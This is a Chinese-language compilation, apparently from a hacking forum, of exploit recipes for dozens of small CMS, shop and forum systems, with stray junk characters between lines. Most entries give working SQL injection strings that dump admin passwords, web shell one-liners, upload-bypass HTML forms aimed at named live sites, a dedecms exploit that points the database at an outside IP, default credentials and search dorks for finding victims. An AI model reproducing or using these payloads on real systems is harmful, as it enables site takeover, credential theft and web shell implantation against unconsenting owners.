启航企业建站系统 cookie注入漏洞通杀所有版本
( L% x6 e7 h f
6 I2 @6 d$ v. W1 P/ U& r6 O* P直接上exploit:
3 W# V$ A( y) p0 B3 @javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
9 G3 c; c2 i! }4 u- Rtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
' Q% ?" s* c7 y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ X4 ]! `. x" I7 ~3 E
Asprain论坛 注册用户 上传图片就可拿到webshell
" H# ?' s3 l2 u0 v3 |4 U) ?
% H8 ]. O. q5 g; U% S5 \( yAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。4 e8 K* n0 B8 e7 o
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
* R; R+ n3 {$ U( c5 H2.gif 为一小图片文件,一定要小,比如qq表情图片1 V/ w- c2 W* {: ?+ w5 q' M
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
: u% Z B4 p( e& z) i4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了, Z1 \# Y2 b: J4 g: M
5.q.asp;.gif
5 `; _( U& ?+ cgoogle:Powered by Asprain7 T" ` i. S% D# J$ m# N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) u1 i- k4 w' u* g% s, Z, y' M( O
0 {% K- b. M6 i5 s* H# R: y7 R6 ~ShopNum1全部系统存在上传漏洞。+ R# D9 j* W3 F. m' `
$ s. z! |! w' C& x& ?首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。% v9 A% I. e, B. i" p
按说明 提示登录后台。。( L6 ~4 y+ h8 `6 P0 l
在后台功能页面->附件管理->附件列表
! M+ D2 g- T9 r% p! x1 k$ _可以直接上传.aspx 后缀木马" l( q. B8 j' j4 F
http://demo.shopnum1.com/upload/20110720083822500.aspx; |% u: I9 O& \: M( |/ N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( b$ V* d9 Z' A! o, L7 }7 c
+ m# e# o, i5 ]牛牛CMS中小企业网站管理系统 上传漏洞! N: t( p! R+ f- C. X
+ e2 K" |5 V8 n7 X- M
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
: l: a2 L/ P. F. |2 D后台:admin/login.asp
, V" B0 a) E ]- p0 y( cewebeditor 5.5 Nday; V) h. C) G$ i0 d8 p& b
exp:
! x8 B& `6 p1 U5 M" Y0 j6 H<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?. M2 N- M6 [& b m2 x0 d9 d$ ]% h
<input?type=file?name=uploadfile?size=100><br><br>?
" u- C: } y- X+ T$ ~+ O7 P<input?type=submit?value=upload>?
m/ F: |- X, N3 p" W: P</form>
; Z. L. e2 _( E, T7 @% r) }ps:先上传小马.3 S% ~7 d" m' t) ~
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
* Z+ L2 O$ n: M3 f3 {
5 k2 G U8 ~2 ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) l0 X# C( g3 a: f
- \/ h" S) {, p) c" }
YothCMS 遍历目录漏洞: x' J6 ~0 g. W8 u6 O
6 E- g8 F# ]) x3 e优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
# s! x3 o/ s0 B3 O, Q+ Z" }. o默认后台:admin/login.asp) \" r3 g0 D; U3 X8 U" G
遍历目录:
6 r" K( p+ `: Cewebeditor/manage/upload.asp?id=1&dir=../
- ^! }# _# ~: |. wdata:
; K; O# S6 e) R$ yhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa' ]( E, p2 v: c0 h- e; i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' w" u1 B& v& @4 i/ }9 E
# u8 ~' Z) f1 }3 F/ B& N2 qNet112企业建站系统 1.07 ] ^4 _/ ~/ o* m" P# t: F
8 ?: c: B% @4 ]' s7 m: s源码简介:# `4 l# x* Y! j/ u2 O7 [1 c2 ]0 z' R
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
' j2 S- }. M4 M+ c0 ~5 [. ~0 G添加管理员:4 r8 R, W* c+ V" o' f
http://www.0855.tv/admin/admin.asp?action=add&level=2
3 `$ b+ L- b, h; Y其实加不加都不是很重要,后台文件都没怎么作验证。7 d. f! e# S' t& z, x- \
上传路径:" y; F9 G: Q3 c0 m2 D" x
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
' O' C8 K$ B W& }( n# [ e9 J6 L' nhttp://www.0855.tv/inc/Upfile.asp?Stype=2" B/ \! |/ [" }2 s, |1 m
怎么利用自己研究。. u/ ~! D9 W8 J3 p+ L7 R
遍历目录:
5 U6 g( q* N0 R. C- \http://www.0855.tv/admin/upfile.asp?path=../..3 B8 _( d8 K! w
如:" Q4 p# K0 J- N; \& C9 m6 C% t
http://www.0855.tv/admin/upfile.asp?path=../admin. n6 F3 `: r2 E5 J
http://www.0855.tv/admin/upfile.asp?path=../data0 ]7 q( c- z4 m4 q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( i. g- l3 N+ i5 o# l
+ x5 {0 |( i7 D% [* }9 A
易和阳光购物商城通杀 上传漏洞
: C' K0 ~6 H. N
& }( k7 c& D3 q前提要求是IIS6.0+asp坏境。: W7 K2 E) `9 I1 F" T' R
漏洞文件Iheeo_upfile.asp + O0 j4 W1 H, v/ ?$ l
过滤不严.直接可以iis6.0上传6 X( r _( d+ s" Z
把ASP木马改成0855.asp;1.gif
% W, ~. t8 D3 `! Q, i1 w直接放到明小子上传% v, N# s. i, |. l
Google搜索:inurl:product.asp?Iheeoid=
6 p4 Z7 ]! \8 P7 K, p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 j- _ Z$ ?( h' c2 N4 X2 A; ~) b; `5 D; n0 g
phpmyadmin后台4种拿shell方法: G |+ F2 l# S- i% U7 w
$ T. }. ^9 F4 z0 |( I, D0 P
方法一:
" V" B2 ~/ @/ n0 T, n, G) z" RCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
" ?+ Z5 D" f6 I" E* }INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');9 u1 p4 f/ \, ?" |
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';) l$ { o) \/ f2 O
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
1 Q @9 l3 T( g' k0 F }' R一句话连接密码:xiaoma
- O' u5 b& J+ J4 W6 C5 t: b8 j9 d方法二:# w9 [5 b5 ]2 S6 R& i
Create TABLE xiaoma (xiaoma1 text NOT NULL);
, `- C5 H9 _. k5 p0 cInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
& A% i7 k& x3 j4 `% tselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
4 y; V! a6 F, Y* I2 R: c% _+ \# I4 wDrop TABLE IF EXISTS xiaoma;* p7 ?7 G1 Y4 s; e* g
方法三:1 V) I# }, S/ b" E9 y
读取文件内容: select load_file('E:/xamp/www/s.php');) n* x/ Z9 {( }7 d9 u
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'" C% ?5 i( j H( m) f
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'( e- q" E9 E5 O0 J
方法四:3 a; \7 G% E: p' [7 f( o5 I; \
select load_file('E:/xamp/www/xiaoma.php');( `0 \" R, G0 L% }
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 m) B2 b0 x) \5 \, ]然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
( U* g$ D+ G5 \0 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; H$ Z$ b2 R; Z7 M
3 `7 u; q. r) B. b! t& h
传信网络独立开发网站源码0day漏洞/ }/ b2 X- O" X; y7 d6 }6 ^9 l
; Y$ }4 j. j" \& i后台system/login.asp
! ^. Q+ m; g: _+ b8 S! d进了后台有个ewebeditor
7 \ l+ N5 r# u- ~Google 搜索inurl:product1.asp?tyc=" j' Q/ [& l: n# d& m, b
编辑器漏洞默认后台ubbcode/admin_login.asp/ z! _1 B; e9 ]. T! f7 o
数据库ubbcode/db/ewebeditor.mdb
+ s/ s# N! Q% w/ v. }默认账号密码yzm 1111111 h2 ?( n+ O% n9 ^" ^
! E3 G4 x3 \' y$ F+ i( g v
拿webshell方法
9 G3 |4 z$ L4 Q5 X' D: t登陆后台点击“样式管理”-选择新增样式 1 p7 Z4 l" O2 l6 A
样式名称:scriptkiddies 随便写
! }9 A6 B# N6 c8 H J路径模式:选择绝对路径
8 t* S5 U) W& P' V9 b图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx+ b1 Q* {# W. ?' W* }1 }
图片类型比如就是我们要上传的ASP木马格式7 l+ q9 N+ w5 w& A
上传路径:/
4 X% T/ L9 B3 p D- `7 h图片限制:写上1000 免的上不了我们的asp木马" R4 M0 C* \! n
上传内容不要写, L# W4 ~: q% N0 H4 ]
可以提交了 " \; K# \) i4 H: ]2 @( Z/ I
样式增加成功!
# ^8 b* p1 H+ j( z返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 1 R/ A( S( \) S: {1 Q) \0 a: O) I
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置! d& u2 ~( a2 G) K; [; I p6 k' L/ U
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies% {1 V( |# @" K" E* b F+ r' _
上ASP木马 回车 等到路径7 i# w) }% y3 n5 Y+ _
" S7 `! [9 K0 m8 y2 J
后台:system/login.asp
# }! k* s5 k7 W2 S! D" jExp:* p+ G5 V4 l/ f, j0 Y4 F- ~ Z
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master$ w U- l; F( _
测试:
$ G y8 ]9 q) E8 {http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
% r: }" y, c9 T, |0 qhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master: {: G u8 I2 ~9 n# I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 ~# m& p; g5 }+ Q7 I
$ u, [0 d/ c/ w! ofoosun 0day 最新注入漏洞" N. |$ b2 g' Z. j, d
7 F) s, F) U) N0 V+ h" V) w4 g
漏洞文件:www.xxx.com/user/SetNextOptions.asp
* s2 @+ B: H2 E% d: U利用简单的方法:
# M; e2 P: |2 B3 @- h4 s暴管理员帐号:
; N. \6 J, p0 N5 Whttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
& S5 J5 e& w/ t* m2 ~2 D: n5 {( K暴管理员密码:
" _1 L9 p6 E. Ehttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
! U! j: \2 O% \8 b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
?2 z2 U x7 p5 E8 T; A; Q: w) ^1 @3 P0 F4 T9 J
网站程序的版权未知!
; M4 V1 J+ A! m3 g( O+ e- g1 I, z, @) j3 O( r- {/ n6 h7 N. _
默认网站数据库:1 C4 u7 I1 w/ m3 k
www.i0day.com/data/nxnews.mdb
0 X7 N$ {- P7 l1 B9 }* R( D$ m5 ^ewebeditor 在线编辑器:
, a$ C6 H! U2 X+ V3 ?编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
9 }* p& v$ N$ B- ^. H/ h4 l登录地址:ewebeditor/admin_login.asp R* J. c; o/ K+ q, ?/ g( X
默认密码:admin admin
' E' c U' ~- K' e) L2 R7 G登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
# t' q' ?; K3 k& F) k7 D, w* a2 E/ z1 s: L S
Sql注入漏洞:. A# _3 N Q, _7 j
http://www.i0day.com/detail.asp?id=12
4 V& z1 i2 O- {) H$ j, Y6 `exp:
. R* k) W2 \6 T% f T! \# uunion select 1,admin,password,4,5,6,7,8 from admin
1 j# O+ P0 T9 B5 J" P爆出明文帐号/密码
' i' H* h/ R2 w! J& h, j3 Q6 N3 N1 ~
' }& D" Y, o6 Y# A; p3 N上传漏洞:
1 _0 r7 q0 l) M( y- `/ H后台+upfile.asp
) d1 C- _1 K' p8 p# U+ [0 ^/ d如:8 T" c7 M) Z% E
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
; C& t3 a! t. v s: B1 a# Dshell的地址:网址+后台+成功上传的马- R" y) d- i7 K( r0 ~7 a
google:inurl:news.asp?lanmuName=
0 n- V" O- C7 j+ L. z------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- W2 q# k0 H p% C9 V
5 A# _# Z# ?; C* i% Ndedecms最新0day利用不进后台直接拿WEBSHELL" {- \# Y' n% d. {
3 H/ A5 ?- c: G V1 _
拿webshell的方法如下:
) u Y7 v( E/ f7 m/ H8 n6 F% {网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
! M* i/ U D; P2 O前题条件,必须准备好自己的dede数据库,然后插入数据:
+ d9 @, z5 M6 A/ `; L6 E- U8 Pinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
5 v4 i; R: _+ E3 |9 E
0 F& b/ K8 R! ~再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
( x( ?% j2 b5 g# j<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
: Q/ e( v2 w. n1 @5 t2 D<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; q/ [( v) ^' }3 h7 i1 W
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
9 }; |6 P& A$ _( `( |<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 o* X4 H# u6 x" Y) y `4 w<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
Q9 \; J3 L- L m: W7 ^1 N<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
# `8 f( T1 }* y! g) M8 V<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />+ q' x1 g3 t% E
<input type="text" value="true" name="nocache" style="width:400">
$ v3 Q8 F; B* _9 |, V<input type="submit" value="提交" name="QuickSearchBtn"><br />: U+ O" T, E, q3 g+ u
</form>
& n7 s6 I0 C. _6 _/ p/ m, g+ k: r<script>
' L$ [/ @2 G$ m! W9 yfunction addaction()
$ \! j; g" R R: L8 P' r$ ?{
- D0 k/ D8 Y1 y, b, Z9 jdocument.QuickSearch.action=document.QuickSearch.doaction.value;2 J) f- b1 D1 k9 n, k' B* c8 B: d
}
2 a( W$ j0 }" ?9 }+ X6 Q</script>
y: g& r+ T A1 {' L-----------------------------------------------------------------------------------------------------------------------------------------------" |) x% g6 s8 A6 M( [: O
+ a& e% v1 v, @2 V: I3 ^6 q
dedecms织梦暴最新严重0day漏洞' z& e. E, }) ]* y: P
bug被利用步骤如下:' G+ e2 M1 L0 ]/ ^. V) C4 h9 ]% e
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. j" E. ^* ]4 M( u8 Y把上面{}上的字母改为当前的验证码,即可直接进入网站后台。' U$ Y1 A* G. `
-------------------------------------------------------------------------------------------------------------------------------------------( H/ W1 M7 @& s
" t$ K8 o' l! ?多多淘宝客程序上传漏洞 & s; a4 N7 t a/ C- j1 y9 ~5 t$ ~4 a: J
漏洞页面:# P; |3 Z0 G! s0 n- {
admin\upload_pic.php
3 ^- G6 q; v; h' K& P; t) ~传送门:7 y% Q! s J3 O) g
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
" V1 H; W0 o' w* {, dPS:copy张图片马 直接 xxx.php 上传抓包地址!
" t8 l. J. ^7 w------------------------------------------------------------------------------------------------------------------------------------------------------
$ H" ~5 q( j' c& ` M" J! o6 A6 {2 I; b1 X7 l/ y/ n% F
无忧公司系统ASP专业版后台上传漏洞% j. a' w- ?+ H: w
漏洞文件 后台上传0 Z# F; W# o0 e* q9 Z; k
admin/uploadPic.asp) B$ @- L* y% c; M+ m0 g% r
漏洞利用 这个漏洞好像是雷池的
6 S: @! K0 y( o! _4 ?+ Y# [6 V5 L) ihttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
, U, Y% R' D2 F8 O等到的webshell路径:: U3 }" C* E% t+ U: g- ]$ Q
/UploadFiles/scriptkiddies.asp;_2.gif# A* m1 H) H5 d- W- d# Z
---------------------------------------------------------------------------------------------------------------------------------------------------& L0 q$ G2 r4 x0 _! z* T0 K
; d5 M1 k% U% U& I: W' V住哪酒店分销联盟系统2010& `& T/ b5 y& M7 R( z7 l
Search:1 l/ h8 x" b* R2 M$ t; j( ]' W& Y
inurl:index.php?m=hotelinfo8 G1 a! d$ x9 r, W ?
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
# F) h: v" c a' x2 {2 W& b默认后台:index.php?m=admin/login% l1 T! j' A7 w k1 j
--------------------------------------------------------------------------------------------------------------------------------------------------
& _/ `1 W8 T; I8 Z
' Y/ ^" m- Y% ginurl:info_Print.asp?ArticleID=+ F# f' B% G; x* z8 p& o6 @
后台 ad_login.asp
! O/ a: z& p1 p5 H+ s q8 _爆管理员密码:5 A1 F# T r/ K5 D/ s3 c, L
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
8 F$ C2 Y8 k. W. M9 D# b: \------------------------------------------------------------------------------------------------------------------------------------------------------------
" T3 H6 P- n) V* w) A% N0 M9 O' u
搜索框漏洞!
: B" M- \2 i$ u/ C% u%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
& ?+ ], A2 N: p' G M* Q! L) t--------------------------------------------------------------------------------------------------------------------------------------------------------
: V% Y0 m9 r6 n1 R o$ U4 }7 [; l4 z( |! M% O' g
关键字:
" u1 T& O& I6 ]' b1 s7 p; s5 }2 Vinurl:/reg_TemletSel.asp?step=27 X" Q9 D; a; n+ X' @8 i
或者
9 E9 J, j N( C$ \* h$ G) Z电子商务自助建站--您理想的助手
9 X: f' F, e9 f-------------------------------------------------------------------------------------------------------------------------------------------------
6 o% z; z7 x9 T5 P t+ [/ Y9 T6 J9 u' h6 J* C* r/ p+ ^
iGiveTest 2.1.0注入漏洞
; J( w% ?" K# v- y9 y1 N# k; T4 BVersion: <= 2.1.0
$ A. K1 @' u, ?. R6 X1 B. c# Homepage: http://iGiveTest.com/$ W' `! @- w2 K3 ?! H' F! @
谷歌关键字: “Powered by iGiveTest”* n6 \% I$ a/ X7 ^ F9 `
随便注册一个帐号。然后暴管理员帐号和密码. N& U3 p4 B7 X3 Z
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1% F: n; {5 {% R( p5 r1 V, ]. y
------------------------------------------------------------------------------------------------------------------------------------------------' [' b% t/ v9 t. b8 T
6 L2 j6 h% `- j f
CKXP网上书店注入漏洞" V% ]+ k, d& h
工具加表:shop_admin 加字段:admin
, {' k( G' }4 V/ o# O2 ]' Y# U后台:admin/login.asp 7 k! b; X! W) M. H' T' f
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/' D6 u |' J2 H: A3 S; o3 V+ R
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息5 @0 @6 ^" I$ J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ N7 ^" Z5 d! [- a" t2 g9 H6 l
! f' ~6 i* W) b! @4 u
段富超个人网站系统留言本写马漏洞6 i% \% J0 A: ?" i" M& ?
源码下载:http://www.mycodes.net/24/2149.htm; r& s9 ^2 ^; m
addgbook.asp 提交一句话。
+ y( x0 @* O& B- N连接: http://www.xxxx.tv/date/date3f.asp' a: l! w% X' r8 o" X; ?. Q, o
google:为防批量,特略!9 R: B) n& S4 ^/ Z6 s" f
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
L/ p) L( A! ?4 z0 U$ m) B
% X; Y9 o# @+ }! U智有道专业旅游系统v1.0 注入及列目录漏洞
1 l ?- }4 d, Z$ s$ h/ }默认后台路径:/admin/login.asp
! l7 e% O1 C6 N* g# D默认管理员:admin) V6 n5 B+ B" R& z% g0 R' Z
默认密码:123456
" V9 r9 c( H2 d5 k/ F# nSQL EXP Tset:+ L# M J2 \8 S
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin$ y/ Y* T& o: ]; `
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( N; O2 _7 t4 j7 V1 v9 {/ X5 b+ b5 { [
ewebeditor(PHP) Ver 3.8 本任意文件上传0day: y+ ?! \7 }/ y& K7 @/ s% t
EXP:6 Z( r, U( r& X
<title>eWebeditoR3.8 for php任意文件上EXP</title>+ w+ L3 Y( h( ]6 i7 ~' x5 ^
<form action="" method=post enctype="multip
, `% A; c- i: Q7 oart/form-data">
! T( @0 T7 A( a( N& U& R<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
# B! ?- m F# n0 l; DURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ; e% d) X, ~0 X1 }. U5 w3 c G
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
: n. j5 |" y2 A) K; mfile:<input type=file name="uploadfile"><br>
+ J7 p1 f- ~7 ^/ X; B% `<input type=button value=submit onclick=fsubmit()>
1 t( Z! Q: B3 Q9 ~5 ~+ c: Q7 h" A</form><br>
9 W& C/ m& P1 T+ B$ M<script> 0 A' `+ }1 M1 v7 r# @8 \6 V
function fsubmit(){
+ S& U' [ N& g: n( F! E) Eform = document.forms[0];
9 ?$ s! `. |) b6 E1 M6 r% e- q1 Hform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
0 q3 c3 O- u: Y7 L% R' ^alert(form.action); ( j" V% O# ^; R3 ~6 `2 @0 ^
form.submit();
/ z! l' I5 z& j' P& n} ! Y# W3 g, B4 i; z3 G
</script>
. O( f3 j X$ z6 n! X注意修改里面ewebeditor的名称还有路径。, {0 a# K6 \4 u3 D' _
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------. e3 u' g2 @5 I9 ]0 I( h& e
0 ]& p" i, O% w% g" M
提交’时提示ip被记录 防注入系统的利用
?2 ]+ ^8 Q: F4 K( L' L网址:http://www.xxx.com/newslist.asp?id=122′. ^2 V3 @" m2 k1 C5 D- v
提示“你的操作已被记录!”等信息。4 @: c* W0 D0 n$ N
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
5 Z8 f- W- b% E3 r7 F' Q-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, `, l5 I% E. k% F# w6 q' w" F c. m( \' |9 e2 Y% _ W! `( x
西部商务网站管理系统 批量拿shell-0day5 Y/ U; O- L. M4 {
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
% _* ]; J+ N, w* Y& t! \3 L) a1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
) V7 D1 i9 v0 d; q2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合8 ?4 m; N6 P: P$ i* m: ~
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂' a. D$ U% F0 R1 x) ?$ h0 a* B
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* t; D3 }; O# j/ C; \! r0 ]) k
0 p! I2 s' w1 K. m6 Q% n, vJspRun!6.0 论坛管理后台注入漏洞- o* {6 L, M3 H# o$ N7 f
* o g k, e0 K$ [: o* ~
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
; T n4 g7 w' K* Q; u8 \4 wJspRun!6.0
, E& @) H% k, y* G+ F. O. f6 P漏洞描述:
. _7 c8 J6 O, ?$ T7 D* qJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
% z, B1 y1 Y5 f; X/ {' G( w在处理后台提交的文件中ForumManageAction.java第1940行
# [& Q2 L' p. i, q2 O; b* C, uString export = request.getParameter("export");//直接获取,没有安全过滤3 n* H* F: i$ V3 Y. |7 g9 s5 f
if(export!=null){
5 c$ E: I6 Q' _# ^/ aList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...! n7 P8 D7 _4 r" `! H0 v8 f2 u
if(styles==null||styles.size()==0){
/ ?3 m* Z1 x: o8 i: b' V<*参考+ v4 ~2 S' p( q* W* N; H
nuanfan@gmail.com
" S) c) G6 o9 U( W$ Y*> SEBUG安全建议:8 k: S4 P9 E6 d9 J
www.jsprun.net, Q8 T+ o: |/ N2 N9 j
(1)安全过滤变量export9 ]% [# Z8 F+ V( X
(2)在查询语句中使用占位符: O% D, l" f: @/ {4 H+ `" ^
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' o3 X( @9 ?4 j" b' U
, q m9 f* g! f0 x$ g: K( K乌邦图企业网站系统 cookies 注入
2 v8 _8 z% f3 f$ G! R1 [
3 r; E3 ?) I0 \! P( i1 H* S程序完整登陆后台:/admin/login.asp) G; f6 q5 M# p R- `+ O
默认登陆帐号:admin 密码:admin8887 P" d' {% `. g0 S& D" x7 ~5 m3 \
语句:(前面加个空格); _$ h1 e. N% k
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin) r# |7 B# K, i, ?
或者是16个字段:4 Y2 C, h( P* X. o- u
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin4 E! e6 X* T+ g6 a. r8 H; B
爆不出来自己猜字段。
6 z2 b. m: C+ U# a( Z注入点:http://www.untnt.com/shownews.asp?=88
& x" _- t6 K# E, i" n9 }getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp; u! ~. b* m' K7 ^
关键字:$ l) }0 C+ }: z0 n
inurl:shownews?asp.id= q c- H7 c# J5 z1 n
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 X+ {8 P' N7 A
5 Y* k% ^0 F- U1 |6 vCKXP网上书店注入漏洞
$ z% C+ X2 O7 y- O; q2 y" r; r8 }& {9 S7 X Q# F W1 w+ A7 i
工具加表:shop_admin 加字段:admin- ]& I+ C/ @; R8 u0 ]# _
后台:admin/login.asp
2 l3 v& W: {; s6 |登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/( A6 t) Z6 M0 j
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
3 {: J/ `3 U0 o' Y. F9 w' C2 A---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ Y' u2 m4 c- ~: [& W
" \* V3 @& `* ?YxShop易想购物商城4.7.1版本任意文件上传漏洞
7 @& [6 w8 D) z- ?* z
2 C* O7 q1 i3 Jhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
- E% g9 O5 U$ O" L) n1 F2 t% o# S8 k跳转到网站根目录上传任意文件。* l* O! X& x( o# a# j
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件3 _$ b) s# E5 v5 I- |; d+ Q) u
